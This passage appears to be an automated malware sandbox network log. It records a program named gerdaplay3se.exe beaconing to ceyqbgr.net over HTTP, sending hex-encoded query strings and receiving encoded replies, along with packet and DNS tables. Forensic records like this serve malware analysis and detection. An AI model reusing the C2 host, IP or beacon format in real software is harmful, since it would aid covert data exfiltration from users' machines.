Sep 27, 2024 17:32:43.421271086 CEST	57567	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:43.536762953 CEST	57567	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:43.537163019 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:43.542056084 CEST	80	57567	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:43.542130947 CEST	57567	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:43.542273998 CEST	80	57568	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:43.542337894 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:43.542486906 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:43.547504902 CEST	80	57568	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:47.253375053 CEST	80	57568	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:47.253484964 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:47.366082907 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:47.371035099 CEST	80	57568	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:47.601715088 CEST	80	57568	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:47.601826906 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:47.710699081 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:47.715781927 CEST	80	57568	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:47.946191072 CEST	80	57568	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:47.946316004 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.068413019 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.068732023 CEST	57570	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.074109077 CEST	80	57568	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:48.074168921 CEST	80	57570	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:48.074177027 CEST	57568	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.074255943 CEST	57570	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.074552059 CEST	57570	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.081239939 CEST	80	57570	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:48.796789885 CEST	80	57570	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:48.796978951 CEST	57570	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.912103891 CEST	57570	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.912491083 CEST	57571	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.917408943 CEST	80	57570	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:48.917491913 CEST	57570	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.917602062 CEST	80	57571	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:48.917675972 CEST	57571	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.917807102 CEST	57571	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:48.922657967 CEST	80	57571	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:49.613887072 CEST	80	57571	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:49.614077091 CEST	57571	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:49.726095915 CEST	57571	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:49.730937958 CEST	80	57571	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:49.962387085 CEST	80	57571	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:49.962516069 CEST	57571	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.085444927 CEST	57571	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.085735083 CEST	57572	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.090773106 CEST	80	57571	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:50.090848923 CEST	57571	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.090889931 CEST	80	57572	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:50.090967894 CEST	57572	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.091181993 CEST	57572	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.095956087 CEST	80	57572	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:50.807029009 CEST	80	57572	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:50.807143927 CEST	57572	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.929296017 CEST	57572	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.929563999 CEST	57573	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.935077906 CEST	80	57573	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:50.935179949 CEST	57573	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.935319901 CEST	57573	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.935528994 CEST	80	57572	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:50.935590029 CEST	57572	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:50.940107107 CEST	80	57573	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:51.669373989 CEST	80	57573	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:51.669495106 CEST	57573	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:51.786983013 CEST	57573	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:51.787242889 CEST	57574	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:51.792606115 CEST	80	57574	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:51.792681932 CEST	57574	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:51.792768002 CEST	57574	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:51.793083906 CEST	80	57573	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:51.793134928 CEST	57573	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:51.800431013 CEST	80	57574	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:52.719605923 CEST	80	57574	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:52.719677925 CEST	57574	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:52.833884001 CEST	57574	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:52.834177017 CEST	57575	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:52.849026918 CEST	80	57574	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:52.849086046 CEST	57574	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:52.849510908 CEST	80	57575	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:52.849574089 CEST	57575	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:52.849694967 CEST	57575	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:52.863738060 CEST	80	57575	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:53.621285915 CEST	80	57575	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:53.621360064 CEST	57575	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:53.740159988 CEST	57575	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:53.740453959 CEST	57576	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:53.750010014 CEST	80	57576	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:53.750096083 CEST	57576	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:53.750183105 CEST	57576	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:53.750972033 CEST	80	57575	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:53.751030922 CEST	57575	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:53.758719921 CEST	80	57576	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:54.453270912 CEST	80	57576	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:54.453355074 CEST	57576	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:54.568293095 CEST	57576	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:54.568598986 CEST	57577	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:54.573776960 CEST	80	57577	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:54.573868036 CEST	57577	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:54.574004889 CEST	57577	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:54.574206114 CEST	80	57576	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:54.574263096 CEST	57576	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:54.581118107 CEST	80	57577	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:55.379906893 CEST	80	57577	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:55.380007982 CEST	57577	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:55.489829063 CEST	57577	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:55.490127087 CEST	57578	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:55.496745110 CEST	80	57577	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:55.496815920 CEST	57577	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:55.496856928 CEST	80	57578	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:55.496922970 CEST	57578	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:55.497025967 CEST	57578	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:55.504401922 CEST	80	57578	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:56.275300026 CEST	80	57578	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:56.275356054 CEST	57578	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:56.397588015 CEST	57578	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:56.397958994 CEST	57579	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:56.430785894 CEST	80	57579	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:56.430984020 CEST	57579	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:56.431134939 CEST	57579	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:56.438292980 CEST	80	57578	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:56.438359022 CEST	57578	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:56.462378979 CEST	80	57579	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:57.201956987 CEST	80	57579	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:57.202033997 CEST	57579	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:57.319653988 CEST	57579	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:57.320053101 CEST	57580	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:57.325484037 CEST	80	57579	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:57.325563908 CEST	57579	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:57.326075077 CEST	80	57580	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:57.326159954 CEST	57580	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:57.326319933 CEST	57580	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:57.331476927 CEST	80	57580	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:58.046159029 CEST	80	57580	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:58.046291113 CEST	57580	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:58.163719893 CEST	57580	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:58.164024115 CEST	57581	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:58.169105053 CEST	80	57581	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:58.169295073 CEST	80	57580	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:58.169495106 CEST	57581	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:58.169517040 CEST	57580	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:58.169636965 CEST	57581	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:58.175813913 CEST	80	57581	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:58.953360081 CEST	80	57581	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:58.953476906 CEST	57581	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:59.071332932 CEST	57582	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:59.071332932 CEST	57581	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:59.109551907 CEST	80	57582	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:59.109632969 CEST	57582	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:59.110501051 CEST	80	57581	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:59.110551119 CEST	57581	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:59.111211061 CEST	57582	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:32:59.143480062 CEST	80	57582	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:59.949852943 CEST	80	57582	185.208.158.248	192.168.2.6
Sep 27, 2024 17:32:59.949927092 CEST	57582	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.070136070 CEST	57582	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.070344925 CEST	57583	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.077785969 CEST	80	57583	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:00.077867985 CEST	57583	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.078115940 CEST	57583	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.079125881 CEST	80	57582	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:00.079174995 CEST	57582	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.085407972 CEST	80	57583	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:00.771852970 CEST	80	57583	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:00.772028923 CEST	57583	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.898545027 CEST	57583	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.901865005 CEST	57584	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.904252052 CEST	80	57583	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:00.905940056 CEST	57583	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.907296896 CEST	80	57584	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:00.909960985 CEST	57584	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.913867950 CEST	57584	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:00.918843985 CEST	80	57584	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:01.633050919 CEST	80	57584	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:01.633141994 CEST	57584	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:01.741727114 CEST	57584	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:01.741858959 CEST	57585	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:01.747342110 CEST	80	57585	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:01.747425079 CEST	57585	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:01.747680902 CEST	57585	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:01.747728109 CEST	80	57584	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:01.747814894 CEST	57584	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:01.754822969 CEST	80	57585	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:02.490453959 CEST	80	57585	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:02.493932009 CEST	57585	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:02.617552996 CEST	57585	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:02.617964029 CEST	57586	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:02.629470110 CEST	80	57586	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:02.629623890 CEST	57586	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:02.629847050 CEST	57586	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:02.630692959 CEST	80	57585	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:02.633950949 CEST	57585	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:02.642290115 CEST	80	57586	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:03.387306929 CEST	80	57586	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:03.387367964 CEST	57586	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:03.509114981 CEST	57586	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:03.509476900 CEST	57587	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:03.518225908 CEST	80	57586	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:03.518286943 CEST	57586	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:03.518698931 CEST	80	57587	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:03.518755913 CEST	57587	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:03.518883944 CEST	57587	80	192.168.2.6	185.208.158.248
Sep 27, 2024 17:33:03.529381037 CEST	80	57587	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:04.246556997 CEST	80	57587	185.208.158.248	192.168.2.6
Sep 27, 2024 17:33:04.249908924 CEST	57587	80	192.168.2.6	185.208.158.248

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 17:31:28.681607962 CEST	53	62292	162.159.36.2	192.168.2.6
Sep 27, 2024 17:31:29.153625965 CEST	51078	53	192.168.2.6	1.1.1.1
Sep 27, 2024 17:31:29.161782980 CEST	53	51078	1.1.1.1	192.168.2.6
Sep 27, 2024 17:31:52.667908907 CEST	59518	53	192.168.2.6	91.211.247.248
Sep 27, 2024 17:31:52.706096888 CEST	53	59518	91.211.247.248	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 17:31:29.153625965 CEST	192.168.2.6	1.1.1.1	0x2676	Standard query (0)	18.31.95.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Sep 27, 2024 17:31:52.667908907 CEST	192.168.2.6	91.211.247.248	0x49d6	Standard query (0)	ceyqbgr.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 17:31:29.161782980 CEST	1.1.1.1	192.168.2.6	0x2676	Name error (3)	18.31.95.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Sep 27, 2024 17:31:52.706096888 CEST	91.211.247.248	192.168.2.6	0x49d6	No error (0)	ceyqbgr.net		185.208.158.248	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ceyqbgr.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	57519	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:31:52.756558895 CEST	318	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf815c5ee949b32 HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:31:53.456573963 CEST	576	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:31:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 31 37 30 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 30 37 33 34 36 61 63 37 30 66 65 37 39 61 62 33 37 35 33 64 65 66 66 64 34 30 30 63 61 34 36 63 64 37 64 62 62 31 33 66 65 32 64 38 38 32 37 65 30 30 65 61 37 36 33 63 32 34 64 62 38 65 32 34 34 65 62 35 61 37 66 34 33 65 37 32 63 36 66 38 62 33 33 36 37 39 30 66 65 31 34 63 30 66 31 39 34 39 61 33 38 63 37 36 39 39 36 31 36 64 38 35 62 38 63 32 62 61 38 35 62 62 32 65 64 34 31 32 30 65 38 37 63 63 63 66 66 37 62 62 66 38 35 65 63 64 35 34 61 65 36 33 35 63 38 31 65 33 30 34 33 35 62 32 34 65 32 33 62 37 34 30 62 37 38 62 30 65 36 38 65 66 65 38 36 32 64 34 37 62 37 31 39 33 66 37 39 39 31 37 36 30 32 61 30 61 35 62 39 38 31 65 63 36 66 33 65 65 30 62 35 32 38 64 32 64 35 62 38 33 39 32 61 30 [TRUNCATED] Data Ascii: 17067b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592de07346ac70fe79ab3753deffd400ca46cd7dbb13fe2d8827e00ea763c24db8e244eb5a7f43e72c6f8b336790fe14c0f1949a38c7699616d85b8c2ba85bb2ed4120e87cccff7bbf85ecd54ae635c81e30435b24e23b740b78b0e68efe862d47b7193f79917602a0a5b981ec6f3ee0b528d2d5b8392a05ef34b0cb90bf67d460012e346fa55ecbed0
Sep 27, 2024 17:31:56.101192951 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:31:56.349338055 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:31:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:31:56.460501909 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:31:56.885082006 CEST	431	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:31:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 30 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 61 64 32 65 61 31 61 31 37 66 35 61 31 35 30 65 63 31 64 64 35 66 65 38 33 65 37 39 31 38 37 34 64 38 62 34 66 64 32 66 62 64 63 33 35 33 33 62 39 34 64 66 62 64 33 64 61 31 61 32 31 65 33 37 31 35 38 61 64 37 35 66 64 36 66 61 31 32 64 35 64 63 30 65 30 64 32 30 64 63 30 35 64 63 63 37 64 62 33 31 61 66 39 33 33 38 61 32 36 65 66 31 33 61 37 37 38 63 37 35 32 62 66 66 64 34 66 65 38 35 64 36 31 34 31 65 65 32 32 36 64 39 36 33 62 36 37 38 65 66 34 31 30 63 38 65 61 38 62 39 62 33 66 63 63 37 31 39 30 31 35 63 36 35 39 38 35 32 39 62 36 35 39 62 33 64 39 0d 0a 30 0d 0a 0d 0a Data Ascii: e067b69c953804b26b565fe95b321bd19a55f78ad2ea1a17f5a150ec1dd5fe83e791874d8b4fd2fbdc3533b94dfbd3da1a21e37158ad75fd6fa12d5dc0e0d20dc05dcc7db31af9338a26ef13a778c752bffd4fe85d6141ee226d963b678ef410c8ea8b9b3fcc719015c6598529b659b3d90
Sep 27, 2024 17:31:57.185530901 CEST	431	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:31:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 30 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 61 64 32 65 61 31 61 31 37 66 35 61 31 35 30 65 63 31 64 64 35 66 65 38 33 65 37 39 31 38 37 34 64 38 62 34 66 64 32 66 62 64 63 33 35 33 33 62 39 34 64 66 62 64 33 64 61 31 61 32 31 65 33 37 31 35 38 61 64 37 35 66 64 36 66 61 31 32 64 35 64 63 30 65 30 64 32 30 64 63 30 35 64 63 63 37 64 62 33 31 61 66 39 33 33 38 61 32 36 65 66 31 33 61 37 37 38 63 37 35 32 62 66 66 64 34 66 65 38 35 64 36 31 34 31 65 65 32 32 36 64 39 36 33 62 36 37 38 65 66 34 31 30 63 38 65 61 38 62 39 62 33 66 63 63 37 31 39 30 31 35 63 36 35 39 38 35 32 39 62 36 35 39 62 33 64 39 0d 0a 30 0d 0a 0d 0a Data Ascii: e067b69c953804b26b565fe95b321bd19a55f78ad2ea1a17f5a150ec1dd5fe83e791874d8b4fd2fbdc3533b94dfbd3da1a21e37158ad75fd6fa12d5dc0e0d20dc05dcc7db31af9338a26ef13a778c752bffd4fe85d6141ee226d963b678ef410c8ea8b9b3fcc719015c6598529b659b3d90
Sep 27, 2024 17:31:57.185894012 CEST	431	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:31:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 30 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 61 64 32 65 61 31 61 31 37 66 35 61 31 35 30 65 63 31 64 64 35 66 65 38 33 65 37 39 31 38 37 34 64 38 62 34 66 64 32 66 62 64 63 33 35 33 33 62 39 34 64 66 62 64 33 64 61 31 61 32 31 65 33 37 31 35 38 61 64 37 35 66 64 36 66 61 31 32 64 35 64 63 30 65 30 64 32 30 64 63 30 35 64 63 63 37 64 62 33 31 61 66 39 33 33 38 61 32 36 65 66 31 33 61 37 37 38 63 37 35 32 62 66 66 64 34 66 65 38 35 64 36 31 34 31 65 65 32 32 36 64 39 36 33 62 36 37 38 65 66 34 31 30 63 38 65 61 38 62 39 62 33 66 63 63 37 31 39 30 31 35 63 36 35 39 38 35 32 39 62 36 35 39 62 33 64 39 0d 0a 30 0d 0a 0d 0a Data Ascii: e067b69c953804b26b565fe95b321bd19a55f78ad2ea1a17f5a150ec1dd5fe83e791874d8b4fd2fbdc3533b94dfbd3da1a21e37158ad75fd6fa12d5dc0e0d20dc05dcc7db31af9338a26ef13a778c752bffd4fe85d6141ee226d963b678ef410c8ea8b9b3fcc719015c6598529b659b3d90

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	57522	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:31:57.310273886 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:31:58.025355101 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:31:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

